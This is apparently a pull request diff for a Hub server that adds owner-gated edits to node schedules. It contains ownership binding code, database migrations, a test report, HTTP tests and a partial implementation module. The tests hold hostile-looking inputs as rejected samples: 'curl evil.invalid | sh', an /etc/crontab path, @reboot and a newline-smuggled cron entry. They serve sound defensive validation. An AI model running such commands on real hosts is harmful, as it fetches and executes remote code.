### PR TITLE
feat: add owner-gated external schedule edit intents

### DIFF
--- a/docs/tests/report-test688-owner-gated-schedule-hub.txt
+++ b/docs/tests/report-test688-owner-gated-schedule-hub.txt
@@ -1,0 +1,75 @@
+# test688 — RFC-036 owner-gated external schedule Hub
+
+Date: 2026-08-10
+Base: 953ca37fb5d0dc205ad16fedd6f2039616b2c17b
+Source commit under test: bf72f0e5201d9957dbb2255a391676a5e225c27c
+Docker tag: anet-test688:dev
+Docker image id: sha256:04ed23fd1d7d2413e7a915ad0849d2c77b8c7752387625c0f97e944abc3c448d
+Embedded ENV: TEST688_SOURCE_COMMIT=bf72f0e5201d9957dbb2255a391676a5e225c27c
+Runner artifact: /tmp/test688-final-n2jxBq/report-test688-owner-gated-schedule-hub.txt
+Runner artifact SHA256: ab989113c810ff1e24c6b876a947e0cab2ca11c7bdea2fb2237238dca9ae566e
+
+## Result
+
+PASS. The exact source commit was copied into a fresh Docker image and run
+against real Bun HTTP serving plus a real SQLite database. No production Hub,
+Dashboard, agent-node, token, config, or database was touched.
+
+- RFC-036 HTTP contract: 10 tests, 77 assertions, 0 failures.
+- Restored-green replay: 10 tests, 77 assertions, 0 failures.
+- Existing SEC1 compatibility: 47 tests, 87 assertions, 0 failures.
+- Existing REST projection compatibility: 5 tests, 30 assertions, 0 failures.
+- Existing Hub scheduler compatibility: 12 tests, 106 assertions, 0 failures.
+- Existing file/network isolation compatibility: 49 tests, 147 assertions, 0 failures.
+- Total normal-path executions: 133 tests, 524 assertions, 0 failures.
+- Witnessed-red mutations: 12/12 returned non-zero, followed by restored green.
+
+## Security properties exercised
+
+1. `owner_user_id` is stamped in the same SQLite transaction that mints the
+   first node-bound ntok; the owner claim is audited before plaintext return.
+2. Existing legacy `owner_user_id=NULL` nodes remain read-only and cannot be
+   claimed by refreshing a token or by `report_status`.
+3. A network owner/admin/member who is not the exact node owner receives 403;
+   there is no admin bypass. Node tokens cannot call the owner write endpoint.
+4. The write body accepts only `enabled` and a strict five-field cron timing.
+   Command, path, env, `@reboot`, sixth fields, CR/LF, invalid ranges, empty
+   patches, and unknown authority fields are rejected before persistence.
+5. Two concurrent owner requests leave exactly one pending intent through a
+   partial UNIQUE index, and stale snapshot revisions create no intent.
+6. Pull requires the exact `bound_node_id`, network and immutable owner tuple.
+   A repeated pull by the same token recovers the same delivered intent.
+7. ACK requires the expected result revision. Only a semantically identical
+   terminal retry is idempotent; a contradictory replay returns 409.
+8. Pending and delivered intents expire with the same bounded TTL so a dead or
+   rotated consumer cannot wedge single-flight forever.
+9. Public history omits user ids, token ids, network ids, command/path/env and
+   storage-only patch fields. Audit details contain ids, revisions, bounded
+   error codes and changed field names only.
+
+## Witnessed-red matrix
+
+Each mutation first verified its source anchor and then ran the unchanged real
+HTTP test. Every mutation failed:
+
+- exact owner equality removed;
+- legacy NULL-owner read-only gate removed;
+- owner-claim audit action removed;
+- structured patch allowlist weakened;
+- bound-node token tuple reduced to token existence;
+- both preflight and in-transaction revision checks removed;
+- SQLite single-flight UNIQUE changed to a non-unique index;
+- lifecycle audit writer disabled;
+- delivered-intent TTL expiration reduced to pending-only;
+- contradictory terminal ACK accepted as idempotent;
+- report-status owner verification removed;
+- `/api/auth/node-token` stopped forwarding `node_id` to atomic mint.
+
+## Honest boundary
+
+This is the Hub/backend segment only. It accepts and delivers a bounded edit
+intent but does not claim that agent-node has applied host state. Agent-node's
+process-level owner-control consumer, managed-cron journal/rollback and the
+Dashboard editor remain separate follow-on segments and are not represented as
+implemented by this report. Natural-language IM/Feishu/CommHub messages receive
+no schedule-write tool or executable path in this segment.

--- a/server/src/auth.ts
+++ b/server/src/auth.ts
@@ -192,18 +192,67 @@ export function login(username: string, password: string): AuthResult {
   };
 }
 
-/** Create a network-scoped token (ntok_) for a specific node */
-export function createNetworkTokenForNode(userId: string, networkId: string, nodeName: string): { ok: boolean; token?: string; error?: string } {
+/**
+ * Create a network-scoped token (ntok_) for a specific node.
+ *
+ * RFC-036: callers that provide nodeId atomically establish the immutable
+ * node-owner binding before the plaintext token is returned. The 3-argument
+ * legacy form remains available for old clients, but its token has no bound
+ * node id and therefore cannot consume external-schedule edit intents.
+ */
+export function createNetworkTokenForNode(userId: string, networkId: string, nodeName: string, nodeId?: string): { ok: boolean; token?: string; token_id?: string; node_id?: string; error?: string } {
   // Verify user is a member of this network with write access
   const role = getUserNetworkRole(userId, networkId);
   if (!role || role === "viewer") return { ok: false, error: "no write access to this network" };
+  if (!nodeName || nodeName.length > 200) return { ok: false, error: "invalid_node_name" };
+  if (nodeId !== undefined && (!/^[A-Za-z0-9][A-Za-z0-9._-]{0,199}$/.test(nodeId))) {
+    return { ok: false, error: "invalid_node_id" };
+  }
   const token = generateNetworkToken();
   const tokenId = generateId("tok");
-  db.run(
-    "INSERT INTO api_tokens (token_id, token_hash, user_id, network_id, name, scope) VALUES (?1, ?2, ?3, ?4, ?5, ?6)",
-    [tokenId, hashToken(token), userId, networkId, `node:${nodeName}`, "network"]
-  );
-  return { ok: true, token };
+  try {
+    db.transaction(() => {
+      if (nodeId) {
+        const existing = db.get<{ network_id: string | null; owner_user_id: string | null }>(
+          "SELECT network_id, owner_user_id FROM nodes WHERE node_id = ?1",
+          nodeId,
+        );
+        if (existing?.network_id && existing.network_id !== networkId) throw new Error("cross_network_node");
+        // Existing pre-RFC-036 rows have no trustworthy owner anchor. A token
+        // refresh must not turn knowledge of a legacy node_id into ownership.
+        // They remain read-only until a separately authorized migration.
+        if (existing && !existing.owner_user_id) throw new Error("node_owner_unclaimed");
+        if (existing?.owner_user_id && existing.owner_user_id !== userId) throw new Error("node_owner_mismatch");
+        db.run(
+          `INSERT INTO nodes (node_id, node_name, alias, network_id, owner_user_id, updated_at)
+           VALUES (?1, ?2, ?2, ?3, ?4, datetime('now'))
+           ON CONFLICT(node_id) DO UPDATE SET
+             node_name = COALESCE(nodes.node_name, ?2),
+             alias = COALESCE(nodes.alias, ?2),
+             network_id = COALESCE(nodes.network_id, ?3),
+             owner_user_id = COALESCE(nodes.owner_user_id, ?4),
+             updated_at = datetime('now')`,
+          [nodeId, nodeName, networkId, userId],
+        );
+        if (!existing) {
+          db.run(
+            `INSERT INTO audit_log (user_id, action, target_type, target_id, detail, network_id)
+             VALUES (?1, 'external_schedule.owner_claimed', 'node', ?2, ?3, ?4)`,
+            [userId, nodeId, JSON.stringify({ node_id: nodeId, network_id: networkId }), networkId],
+          );
+        }
+      }
+      db.run(
+        "INSERT INTO api_tokens (token_id, token_hash, user_id, network_id, name, scope, bound_node_id) VALUES (?1, ?2, ?3, ?4, ?5, 'network', ?6)",
+        [tokenId, hashToken(token), userId, networkId, `node:${nodeName}`, nodeId ?? null],
+      );
+    });
+  } catch (error: any) {
+    const code = String(error?.message || "node_token_create_failed");
+    if (code === "cross_network_node" || code === "node_owner_unclaimed" || code === "node_owner_mismatch") return { ok: false, error: code };
+    throw error;
+  }
+  return { ok: true, token, token_id: tokenId, ...(nodeId ? { node_id: nodeId } : {}) };
 }
 
 export function resolveToken(token: string): { user: AuthUser; networkId: string | null; tokenName: string | null; tokenId: string | null } | null {

--- a/server/src/db.ts
+++ b/server/src/db.ts
@@ -311,6 +311,16 @@ try {
   if (!/duplicate column|already exists/i.test(e?.message || "")) throw e;
 }
 
+// RFC-036 / B4 — immutable per-node owner. New nodes receive this value in
+// the same transaction that mints their node token. Heartbeats may verify the
+// binding but must never first-claim or replace it. Legacy NULL rows remain
+// read-only for external-schedule writes.
+try {
+  db.exec(`ALTER TABLE nodes ADD COLUMN owner_user_id TEXT`);
+} catch (e: any) {
+  if (!/duplicate column|already exists/i.test(e?.message || "")) throw e;
+}
+
 // RFC-026 §9 / #338 PR2 — daemon self-declare fields promoted from
 // config_snapshot to first-class indexable columns. The hub
 // `list_host_supervisors` MCP tool reads these directly without parsing
@@ -505,6 +515,7 @@ for (const ddl of [
   "ALTER TABLE api_tokens ADD COLUMN request_id TEXT",
   "ALTER TABLE api_tokens ADD COLUMN revoked_at TEXT",
   "ALTER TABLE api_tokens ADD COLUMN role TEXT",
+  "ALTER TABLE api_tokens ADD COLUMN bound_node_id TEXT",
 ]) {
   try { db.exec(ddl); }
   catch (e: any) {
@@ -513,6 +524,8 @@ for (const ddl of [
 }
 try { db.exec(`CREATE INDEX IF NOT EXISTS idx_tokens_request ON api_tokens(request_id)`); }
 catch (e: any) { /* index may already exist */ void e; }
+try { db.exec(`CREATE INDEX IF NOT EXISTS idx_tokens_bound_node ON api_tokens(bound_node_id)`); }
+catch (e: any) { void e; }
 
 // RFC-026 v4 §2.5 + §4.4 — node_create_requests. Metadata only;
 // env_blob NEVER lives in this table (F1 mint-stream-evict — secret
@@ -1142,6 +1155,39 @@ db.exec(`
     ON scheduled_task_runs(network_id, created_at DESC);
 `);
 try { db.exec("ALTER TABLE scheduled_tasks ADD COLUMN misfire_policy TEXT NOT NULL DEFAULT 'catch_up_once'"); } catch {}
+
+// RFC-036 / B4 — owner-authorized edits of node-host managed schedules.
+// This is intentionally separate from Hub scheduled_tasks: these rows are
+// one-shot control intents consumed by the exact token-bound node. The partial
+// unique index makes the single-flight promise survive multiple Hub workers.
+db.exec(`
+  CREATE TABLE IF NOT EXISTS external_schedule_edits (
+    intent_id          TEXT PRIMARY KEY,
+    network_id         TEXT NOT NULL,
+    node_id            TEXT NOT NULL,
+    schedule_id        TEXT NOT NULL,
+    base_revision      INTEGER NOT NULL,
+    patch_json         TEXT NOT NULL,
+    status             TEXT NOT NULL DEFAULT 'pending',
+    expires_at         INTEGER NOT NULL,
+    created_at         INTEGER NOT NULL,
+    delivered_at       INTEGER,
+    acked_at           INTEGER,
+    created_by_user    TEXT NOT NULL,
+    created_by_token   TEXT NOT NULL,
+    consumed_by_token  TEXT,
+    result_revision    INTEGER,
+    error_code         TEXT
+  );
+
+  CREATE INDEX IF NOT EXISTS idx_external_schedule_edits_node
+    ON external_schedule_edits(network_id, node_id, status, created_at);
+  CREATE INDEX IF NOT EXISTS idx_external_schedule_edits_owner
+    ON external_schedule_edits(created_by_user, created_at DESC);
+  CREATE UNIQUE INDEX IF NOT EXISTS idx_external_schedule_edits_singleflight
+    ON external_schedule_edits(node_id, schedule_id)
+    WHERE status IN ('pending', 'delivered');
+`);
 try { db.exec("CREATE INDEX IF NOT EXISTS idx_tasks_parent ON tasks(parent_task_id)"); } catch {}
 
 // Helpers

--- a/server/src/external-schedule-edits-http.test.ts
+++ b/server/src/external-schedule-edits-http.test.ts
@@ -1,0 +1,316 @@
+import { afterAll, beforeAll, describe, expect, test } from "bun:test";
+import { mkdtempSync, rmSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { addNetworkMember, createNetworkTokenForNode, register } from "./auth.js";
+import { db } from "./db.js";
+import { upsertNodeWithSec1Guard } from "./tools.js";
+
+const dir = mkdtempSync(join(tmpdir(), "anet-external-schedule-edits-"));
+if (!process.env.COMMHUB_DB) throw new Error("test688 requires COMMHUB_DB before module import");
+
+const stamp = `${process.pid}_${Date.now()}`;
+const nodeId = `n_b4_${stamp}`;
+const alias = `b4-node-${stamp}`;
+const scheduleId = "managed-news-pull";
+let server: any;
+let base = "";
+let networkId = "";
+let adminToken = "";
+let ownerToken = "";
+let memberToken = "";
+let nodeToken = "";
+let foreignNodeToken = "";
+let nodeTokenId = "";
+let ownerId = "";
+let memberId = "";
+
+async function api(token: string, path: string, init?: RequestInit) {
+  const response = await fetch(`${base}${path}`, {
+    ...init,
+    headers: { Authorization: `Bearer ${token}`, "Content-Type": "application/json", ...(init?.headers || {}) },
+  });
+  return { status: response.status, body: await response.json() as any };
+}
+
+function snapshot(revision: number, extra: Record<string, unknown> = {}) {
+  return JSON.stringify({
+    observed_at: new Date().toISOString(),
+    schedules: [{
+      id: scheduleId,
+      name: "Pull X news",
+      kind: "cron",
+      frequency: "0 */6 * * *",
+      status: "active",
+      enabled: true,
+      editable: true,
+      revision,
+      log_ref: "grok-news.log",
+      ...extra,
+    }],
+  });
+}
+
+beforeAll(async () => {
+  const admin = register(`b4_admin_${stamp}`, "B4Admin123!", undefined, "B4 Admin");
+  const owner = register(`b4_owner_${stamp}`, "B4Owner123!", undefined, "B4 Owner");
+  const member = register(`b4_member_${stamp}`, "B4Member123!", undefined, "B4 Member");
+  expect(admin.ok && owner.ok && member.ok).toBe(true);
+  adminToken = admin.token!;
+  ownerToken = owner.token!;
+  memberToken = member.token!;
+  networkId = admin.network_id!;
+  const adminId = admin.user!.user_id;
+  ownerId = owner.user!.user_id;
+  memberId = member.user!.user_id;
+  expect(addNetworkMember(networkId, ownerId, "member", adminId).ok).toBe(true);
+  expect(addNetworkMember(networkId, memberId, "member", adminId).ok).toBe(true);
+
+  const minted = createNetworkTokenForNode(ownerId, networkId, alias, nodeId);
+  expect(minted.ok).toBe(true);
+  nodeToken = minted.token!;
+  nodeTokenId = minted.token_id!;
+  const foreign = createNetworkTokenForNode(memberId, networkId, `foreign-${alias}`, `n_foreign_${stamp}`);
+  expect(foreign.ok).toBe(true);
+  foreignNodeToken = foreign.token!;
+
+  db.run(
+    `INSERT INTO sessions (resume_id, alias, status, node_id, network_id, external_schedules, updated_at)
+     VALUES (?1, ?2, 'idle', ?3, ?4, ?5, datetime('now'))`,
+    [`r_b4_${stamp}`, alias, nodeId, networkId, snapshot(7)],
+  );
+
+  const mod: any = await import("./server.js");
+  server = mod.bootServer({ port: 0, hostname: "127.0.0.1" });
+  base = `http://127.0.0.1:${server.port}`;
+});
+
+afterAll(() => {
+  try { server?.stop?.(true); } catch {}
+  try { rmSync(dir, { recursive: true, force: true }); } catch {}
+});
+
+describe("RFC-036 exact-owner external schedule edit intents", () => {
+  test("ownership is pinned at node-token mint and cannot be stolen", () => {
+    const node = db.get<any>("SELECT owner_user_id, network_id FROM nodes WHERE node_id = ?1", nodeId)!;
+    expect(node.owner_user_id).toBe(ownerId);
+    expect(node.network_id).toBe(networkId);
+    const ownerAudit = db.get<any>("SELECT detail FROM audit_log WHERE action = 'external_schedule.owner_claimed' AND target_id = ?1", nodeId)!;
+    expect(ownerAudit).toBeTruthy();
+    expect(JSON.parse(ownerAudit.detail)).toEqual({ node_id: nodeId, network_id: networkId });
+    const theft = createNetworkTokenForNode(memberId, networkId, alias, nodeId);
+    expect(theft).toEqual({ ok: false, error: "node_owner_mismatch" });
+
+    const legacy = createNetworkTokenForNode(ownerId, networkId, `${alias}-legacy`);
+    expect(legacy.ok).toBe(true);
+    expect(db.get<any>("SELECT bound_node_id FROM api_tokens WHERE token_id = ?1", legacy.token_id!)!.bound_node_id).toBeNull();
+  });
+
+  test("the real node-token HTTP endpoint requires and persists the immutable node binding", async () => {
+    const httpNodeId = `n_b4_http_${stamp}`;
+    const minted = await api(ownerToken, "/api/auth/node-token", {
+      method: "POST",
+      body: JSON.stringify({ network_id: networkId, node_name: `${alias}-http`, node_id: httpNodeId }),
+    });
+    expect(minted.status).toBe(200);
+    expect(minted.body.node_id).toBe(httpNodeId);
+    expect(db.get<any>("SELECT owner_user_id FROM nodes WHERE node_id = ?1", httpNodeId)!.owner_user_id).toBe(ownerId);
+    const resolved = db.get<any>("SELECT bound_node_id FROM api_tokens WHERE token_id = ?1", minted.body.token_id)!;
+    expect(resolved.bound_node_id).toBe(httpNodeId);
+  });
+
+  test("report_status verifies an owner binding but never first-claims a legacy node", () => {
+    expect(upsertNodeWithSec1Guard({
+      node_id: nodeId,
+      callerNetworkId: networkId,
+      callerUserId: ownerId,
+      callerTokenId: nodeTokenId,
+      alias,
+      runtime: "codex-app-server",
+    }).result).toBe("updated");
+    const wrongOwner = upsertNodeWithSec1Guard({
+      node_id: nodeId,
+      callerNetworkId: networkId,
+      callerUserId: memberId,
+      callerTokenId: nodeTokenId,
+      alias,
+    });
+    expect(wrongOwner).toMatchObject({ result: "refused", reason: "owner_mismatch" });
+
+    const legacyNodeId = `n_b4_legacy_${stamp}`;
+    db.run(
+      "INSERT INTO nodes (node_id, node_name, alias, network_id) VALUES (?1, ?2, ?2, ?3)",
+      [legacyNodeId, `${alias}-legacy`, networkId],
+    );
+    expect(upsertNodeWithSec1Guard({
+      node_id: legacyNodeId,
+      callerNetworkId: networkId,
+      callerUserId: ownerId,
+      alias: `${alias}-legacy`,
+      runtime: "claude-code-cli",
+    }).result).toBe("updated");
+    expect(db.get<any>("SELECT owner_user_id FROM nodes WHERE node_id = ?1", legacyNodeId)!.owner_user_id).toBeNull();
+    const legacyClaim = createNetworkTokenForNode(ownerId, networkId, `${alias}-legacy`, legacyNodeId);
+    expect(legacyClaim).toEqual({ ok: false, error: "node_owner_unclaimed" });
+    expect(db.get<any>("SELECT owner_user_id FROM nodes WHERE node_id = ?1", legacyNodeId)!.owner_user_id).toBeNull();
+  });
+
+  test("network admin, member, node token, and unknown authority fields cannot create an intent", async () => {
+    const request = {
+      network_id: networkId,
+      schedule_id: scheduleId,
+      base_revision: 7,
+      patch: { enabled: false },
+    };
+    for (const token of [adminToken, memberToken, nodeToken]) {
+      const denied = await api(token, `/api/nodes/${nodeId}/external-schedule-edits`, { method: "POST", body: JSON.stringify(request) });
+      expect(denied.status).toBe(403);
+    }
+    const forged = await api(ownerToken, `/api/nodes/${nodeId}/external-schedule-edits`, {
+      method: "POST",
+      body: JSON.stringify({ ...request, owner_user_id: ownerId }),
+    });
+    expect(forged.status).toBe(400);
+    expect(forged.body.error).toBe("invalid_request");
+    expect(db.get<any>("SELECT COUNT(*) AS count FROM external_schedule_edits")!.count).toBe(0);
+    expect(db.get<any>("SELECT COUNT(*) AS count FROM audit_log WHERE action = 'external_schedule.edit_requested'")!.count).toBe(0);
+  });
+
+  test("structured patch rejects command, paths, aliases, malformed cron, and empty edits before write", async () => {
+    const invalidPatches = [
+      { command: "curl evil.invalid | sh" },
+      { path: "/etc/crontab" },
+      { env: { SECRET: "value" } },
+      { cron: "@reboot" },
+      { cron: "0 0 * * * root" },
+      { cron: "0 0 * * *\n* * * * *" },
+      { cron: "61 0 * * *" },
+      {},
+    ];
+    for (const patch of invalidPatches) {
+      const denied = await api(ownerToken, `/api/nodes/${nodeId}/external-schedule-edits`, {
+        method: "POST",
+        body: JSON.stringify({ network_id: networkId, schedule_id: scheduleId, base_revision: 7, patch }),
+      });
+      expect(denied.status).toBe(400);
+    }
+    expect(db.get<any>("SELECT COUNT(*) AS count FROM external_schedule_edits")!.count).toBe(0);
+  });
+
+  test("concurrent owner requests create exactly one opaque pending intent", async () => {
+    const request = {
+      method: "POST",
+      body: JSON.stringify({
+        network_id: networkId,
+        schedule_id: scheduleId,
+        base_revision: 7,
+        patch: { cron: "0 */12 * * *", enabled: true },
+      }),
+    };
+    const responses = await Promise.all([
+      api(ownerToken, `/api/nodes/${nodeId}/external-schedule-edits`, request),
+      api(ownerToken, `/api/nodes/${nodeId}/external-schedule-edits`, request),
+    ]);
+    expect(responses.map((value) => value.status).sort()).toEqual([202, 409]);
+    const accepted = responses.find((value) => value.status === 202)!;
+    expect(accepted.body.intent.intent_id).toMatch(/^sei_[0-9a-f-]+$/);
+    expect(accepted.body.intent.patch).toEqual({ enabled: true, cron: "0 */12 * * *" });
+    expect(accepted.body.intent.created_by_user).toBeUndefined();
+    expect(accepted.body.intent.created_by_token).toBeUndefined();
+    expect(db.get<any>("SELECT COUNT(*) AS count FROM external_schedule_edits")!.count).toBe(1);
+
+    const audit = db.get<any>("SELECT detail FROM audit_log WHERE action = 'external_schedule.edit_requested'")!;
+    expect(audit).toBeTruthy();
+    expect(audit.detail).not.toContain("curl");
+    expect(audit.detail).not.toContain("/etc/");
+    expect(audit.detail).not.toContain("utok_");
+    expect(JSON.parse(audit.detail).fields).toEqual(["cron", "enabled"]);
+  });
+
+  test("only the exact bound node token can claim; lost-response pull and terminal ack are idempotent", async () => {
+    const foreign = await api(foreignNodeToken, `/api/nodes/${nodeId}/external-schedule-edits/pending`);
+    expect(foreign.status).toBe(403);
+    expect(foreign.body.error).toBe("node_token_binding_required");
+
+    const first = await api(nodeToken, `/api/nodes/${nodeId}/external-schedule-edits/pending`);
+    expect(first.status).toBe(200);
+    expect(first.body.intent.status).toBe("delivered");
+    const intentId = first.body.intent.intent_id;
+    const repeated = await api(nodeToken, `/api/nodes/${nodeId}/external-schedule-edits/pending`);
+    expect(repeated.body.intent.intent_id).toBe(intentId);
+
+    const wrongRevision = await api(nodeToken, `/api/nodes/${nodeId}/external-schedule-edits/${intentId}/ack`, {
+      method: "POST", body: JSON.stringify({ status: "applied", result_revision: 99 }),
+    });
+    expect(wrongRevision.status).toBe(409);
+    expect(wrongRevision.body.error).toBe("invalid_result_revision");
+
+    const applied = await api(nodeToken, `/api/nodes/${nodeId}/external-schedule-edits/${intentId}/ack`, {
+      method: "POST", body: JSON.stringify({ status: "applied", result_revision: 8 }),
+    });
+    expect(applied.status).toBe(200);
+    expect(applied.body.intent.status).toBe("applied");
+    const retried = await api(nodeToken, `/api/nodes/${nodeId}/external-schedule-edits/${intentId}/ack`, {
+      method: "POST", body: JSON.stringify({ status: "applied", result_revision: 8 }),
+    });
+    expect(retried.status).toBe(200);
+    expect(retried.body.idempotent).toBe(true);
+    const contradictory = await api(nodeToken, `/api/nodes/${nodeId}/external-schedule-edits/${intentId}/ack`, {
+      method: "POST", body: JSON.stringify({ status: "rejected", error_code: "local_apply_failed" }),
+    });
+    expect(contradictory.status).toBe(409);
+    expect(contradictory.body.error).toBe("intent_already_terminal");
+    expect(db.get<any>("SELECT COUNT(*) AS count FROM audit_log WHERE action = 'external_schedule.edit_applied'")!.count).toBe(1);
+  });
+
+  test("a delivered intent expires with its TTL and cannot permanently wedge single-flight", async () => {
+    db.run("UPDATE sessions SET external_schedules = ?1, updated_at = datetime('now', '+1 second') WHERE node_id = ?2", [snapshot(8), nodeId]);
+    const created = await api(ownerToken, `/api/nodes/${nodeId}/external-schedule-edits`, {
+      method: "POST",
+      body: JSON.stringify({ network_id: networkId, schedule_id: scheduleId, base_revision: 8, patch: { enabled: false } }),
+    });
+    expect(created.status).toBe(202);
+    const claimed = await api(nodeToken, `/api/nodes/${nodeId}/external-schedule-edits/pending`);
+    expect(claimed.body.intent.intent_id).toBe(created.body.intent.intent_id);
+    db.run("UPDATE external_schedule_edits SET expires_at = ?1 WHERE intent_id = ?2", [Date.now() - 1, created.body.intent.intent_id]);
+    const afterExpiry = await api(nodeToken, `/api/nodes/${nodeId}/external-schedule-edits/pending`);
+    expect(afterExpiry.body.intent).toBeNull();
+    expect(db.get<any>("SELECT status FROM external_schedule_edits WHERE intent_id = ?1", created.body.intent.intent_id)!.status).toBe("expired");
+
+    const replacement = await api(ownerToken, `/api/nodes/${nodeId}/external-schedule-edits`, {
+      method: "POST",
+      body: JSON.stringify({ network_id: networkId, schedule_id: scheduleId, base_revision: 8, patch: { enabled: false } }),
+    });
+    expect(replacement.status).toBe(202);
+    db.run("DELETE FROM external_schedule_edits WHERE intent_id IN (?1, ?2)", [created.body.intent.intent_id, replacement.body.intent.intent_id]);
+  });
+
+  test("stale snapshot revision and read-only schedules fail closed without creating intent", async () => {
+    db.run("UPDATE sessions SET external_schedules = ?1, updated_at = datetime('now', '+1 second') WHERE node_id = ?2", [snapshot(8), nodeId]);
+    const stale = await api(ownerToken, `/api/nodes/${nodeId}/external-schedule-edits`, {
+      method: "POST",
+      body: JSON.stringify({ network_id: networkId, schedule_id: scheduleId, base_revision: 7, patch: { enabled: false } }),
+    });
+    expect(stale.status).toBe(409);
+    expect(stale.body.error).toBe("revision_conflict");
+
+    db.run("UPDATE sessions SET external_schedules = ?1, updated_at = datetime('now', '+2 second') WHERE node_id = ?2", [snapshot(8, { editable: false }), nodeId]);
+    const readOnly = await api(ownerToken, `/api/nodes/${nodeId}/external-schedule-edits`, {
+      method: "POST",
+      body: JSON.stringify({ network_id: networkId, schedule_id: scheduleId, base_revision: 8, patch: { enabled: false } }),
+    });
+    expect(readOnly.status).toBe(409);
+    expect(readOnly.body.error).toBe("schedule_read_only");
+    expect(db.get<any>("SELECT COUNT(*) AS count FROM external_schedule_edits")!.count).toBe(1);
+  });
+
+  test("owner history exposes no identity, token, network, or command metadata", async () => {
+    const listed = await api(ownerToken, `/api/nodes/${nodeId}/external-schedule-edits?network_id=${encodeURIComponent(networkId)}`);
+    expect(listed.status).toBe(200);
+    expect(listed.body.edits).toHaveLength(1);
+    const serialized = JSON.stringify(listed.body);
+    for (const secretField of ["created_by_user", "created_by_token", "consumed_by_token", "network_id", "command", "path", "env"]) {
+      expect(serialized).not.toContain(secretField);
+    }
+  });
+});

--- a/server/src/external-schedule-edits.ts
+++ b/server/src/external-schedule-edits.ts
@@ -1,0 +1,314 @@
+import { db } from "./db.js";
+import { getUserNetworkRole } from "./auth.js";
+import { pushEvent } from "./push.js";
+import { parseExternalSchedulePatch, type ExternalSchedulePatch } from "./shared/external-schedule-contract.js";
+
+type Auth = {
+  userId: string;
+  networkId: string | null;
+  username: string;
+  tokenId: string | null;
+} | null;
+
+export type ExternalScheduleEditContext = {
+  req: Request;
+  url: URL;
+  auth: Auth;
+  isUserToken: boolean;
+  isNodeToken: boolean;
+};
+
+type NodeRow = {
+  node_id: string;
+  alias: string | null;
+  network_id: string | null;
+  owner_user_id: string | null;
+};
+
+type EditRow = {
+  intent_id: string;
+  network_id: string;
+  node_id: string;
+  schedule_id: string;
+  base_revision: number;
+  patch_json: string;
+  status: string;
+  expires_at: number;
+  created_at: number;
+  delivered_at: number | null;
+  acked_at: number | null;
+  created_by_user: string;
+  created_by_token: string;
+  consumed_by_token: string | null;
+  result_revision: number | null;
+  error_code: string | null;
+};
+
+const INTENT_TTL_MS = 5 * 60_000;
+const NODE_ID_RE = /^[A-Za-z0-9][A-Za-z0-9._-]{0,199}$/;
+const SCHEDULE_ID_RE = /^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$/;
+
+function error(error: string, status: number, extra: Record<string, unknown> = {}): Response {
+  return Response.json({ ok: false, error, ...extra }, { status });
+}
+
+async function bodyObject(req: Request): Promise<Record<string, unknown>> {
+  const value = await req.json();
+  if (!value || typeof value !== "object" || Array.isArray(value)) throw new Error("invalid_json");
+  return value as Record<string, unknown>;
+}
+
+function exactKeys(obj: Record<string, unknown>, allowed: readonly string[]): boolean {
+  const set = new Set(allowed);
+  return Object.keys(obj).every((key) => set.has(key));
+}
+
+function nodeRow(nodeId: string): NodeRow | null {
+  return db.get<NodeRow>(
+    "SELECT node_id, alias, network_id, owner_user_id FROM nodes WHERE node_id = ?1",
+    nodeId,
+  ) ?? null;
+}
+
+function requireOwner(ctx: ExternalScheduleEditContext, node: NodeRow, networkId: unknown): Response | null {
+  if (!ctx.isUserToken || !ctx.auth?.tokenId) return error("user_token_required", 403);
+  if (!node.owner_user_id) return error("node_owner_unclaimed", 409);
+  if (ctx.auth.userId !== node.owner_user_id) return error("node_owner_required", 403);
+  if (typeof networkId !== "string" || networkId !== node.network_id) return error("cross_network_node", 403);
+  if (!getUserNetworkRole(ctx.auth.userId, networkId)) return error("network_membership_required", 403);
+  return null;
+}
+
+function requireBoundNode(ctx: ExternalScheduleEditContext, node: NodeRow): Response | null {
+  if (!ctx.isNodeToken || !ctx.auth?.tokenId) return error("network_token_required", 403);
+  const token = db.get<{ token_id: string; user_id: string; network_id: string | null; name: string; bound_node_id: string | null }>(
+    "SELECT token_id, user_id, network_id, name, bound_node_id FROM api_tokens WHERE token_id = ?1",
+    ctx.auth.tokenId,
+  );
+  if (!token || token.bound_node_id !== node.node_id || token.network_id !== node.network_id || token.user_id !== node.owner_user_id) {
+    return error("node_token_binding_required", 403);
+  }
+  return null;
+}
+
+function reportedSchedule(node: NodeRow, scheduleId: string): Record<string, unknown> | null {
+  const row = db.get<{ external_schedules: string }>(
+    `SELECT external_schedules FROM sessions
+     WHERE node_id = ?1 AND network_id = ?2 AND external_schedules IS NOT NULL
+     ORDER BY updated_at DESC LIMIT 1`,
+    node.node_id,
+    node.network_id,
+  );
+  if (!row) return null;
+  try {
+    const snapshot = JSON.parse(row.external_schedules) as any;
+    if (!Array.isArray(snapshot?.schedules)) return null;
+    return snapshot.schedules.find((entry: any) => entry?.id === scheduleId) ?? null;
+  } catch {
+    return null;
+  }
+}
+
+function publicEdit(row: EditRow): Record<string, unknown> {
+  let patch: ExternalSchedulePatch = {};
+  try { patch = JSON.parse(row.patch_json); } catch {}
+  return {
+    intent_id: row.intent_id,
+    node_id: row.node_id,
+    schedule_id: row.schedule_id,
+    base_revision: row.base_revision,
+    patch,
+    status: row.status,
+    expires_at: new Date(row.expires_at).toISOString(),
+    created_at: new Date(row.created_at).toISOString(),
+    delivered_at: row.delivered_at ? new Date(row.delivered_at).toISOString() : null,
+    acked_at: row.acked_at ? new Date(row.acked_at).toISOString() : null,
+    result_revision: row.result_revision,
+    error_code: row.error_code,
+  };
+}
+
+function audit(
+  userId: string | null,
+  username: string | null,
+  action: string,
+  intentId: string,
+  networkId: string,
+  detail: Record<string, unknown>,
+): void {
+  db.run(
+    `INSERT INTO audit_log (user_id, username, action, target_type, target_id, detail, network_id)
+     VALUES (?1, ?2, ?3, 'external_schedule_edit', ?4, ?5, ?6)`,
+    [userId, username, action, intentId, JSON.stringify(detail), networkId],
+  );
+}
+
+function expireOpenIntents(node: NodeRow, now: number): void {
+  const expired = db.all<EditRow>(
+    "SELECT * FROM external_schedule_edits WHERE node_id = ?1 AND network_id = ?2 AND status IN ('pending', 'delivered') AND expires_at <= ?3",
+    node.node_id,
+    node.network_id,
+    now,
+  );
+  for (const row of expired) {
+    const changed = db.run(
+      "UPDATE external_schedule_edits SET status = 'expired', acked_at = ?1, error_code = 'intent_expired' WHERE intent_id = ?2 AND status IN ('pending', 'delivered') AND expires_at <= ?1",
+      [now, row.intent_id],
+    );
